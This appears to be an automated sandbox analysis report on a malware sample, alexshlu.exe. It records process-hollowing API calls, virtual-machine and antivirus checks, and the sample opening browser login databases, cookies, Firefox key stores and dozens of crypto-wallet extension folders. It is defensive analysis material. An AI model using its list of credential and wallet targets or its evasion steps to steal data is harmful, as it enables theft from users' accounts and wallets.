                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754749506.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775631412.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: alexshlu.exe, 00000003.00000002.1775468218.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: alexshlu.exe, 00000003.00000003.1476498651.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476568193.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754886041.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775564749.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774889064.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1429214534.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\alexshlu.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 3_2_0043B480 LdrInitializeThunk,3_2_0043B480
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002AD86F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002AD86F
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002D61A9 mov edi, dword ptr fs:[00000030h]0_2_002D61A9
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002A1B70 mov edi, dword ptr fs:[00000030h]0_2_002A1B70
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 3_2_002A1B70 mov edi, dword ptr fs:[00000030h]3_2_002A1B70
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002BC275 GetProcessHeap,0_2_002BC275
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002AD863 SetUnhandledExceptionFilter,0_2_002AD863
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002B695D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002B695D
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002AD4B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002AD4B3
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 3_2_002AD86F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_002AD86F
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 3_2_002AD863 SetUnhandledExceptionFilter,3_2_002AD863
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 3_2_002B695D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_002B695D
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 3_2_002AD4B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_002AD4B3

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002D61A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_002D61A9
                Source: C:\Users\user\Desktop\alexshlu.exe Memory written: C:\Users\user\Desktop\alexshlu.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\alexshlu.exe Process created: C:\Users\user\Desktop\alexshlu.exe "C:\Users\user\Desktop\alexshlu.exe"
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: EnumSystemLocalesW,0_2_002C0111
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,0_2_002C0170
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: EnumSystemLocalesW,0_2_002C0245
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,0_2_002C0290
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_002C0337
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: EnumSystemLocalesW,0_2_002BBB60
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_002BFBD2
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,0_2_002C043D
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,0_2_002BB5BC
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: EnumSystemLocalesW,0_2_002BFE23
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_002BFEBE
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: EnumSystemLocalesW,3_2_002C0111
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,3_2_002C0170
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: EnumSystemLocalesW,3_2_002C0245
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,3_2_002C0290
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_002C0337
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: EnumSystemLocalesW,3_2_002BBB60
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_002BFBD2
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,3_2_002C043D
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,3_2_002BB5BC
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: EnumSystemLocalesW,3_2_002BFE23
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_002BFEBE
                Source: C:\Users\user\Desktop\alexshlu.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\alexshlu.exe Code function: 0_2_002AE170 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_002AE170
                Source: C:\Users\user\Desktop\alexshlu.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: alexshlu.exe, 00000003.00000003.1707860479.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754886041.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775723436.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775564749.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774889064.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775468218.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1690463169.0000000000CFC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\alexshlu.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: alexshlu.exe PID: 7720, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaa
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
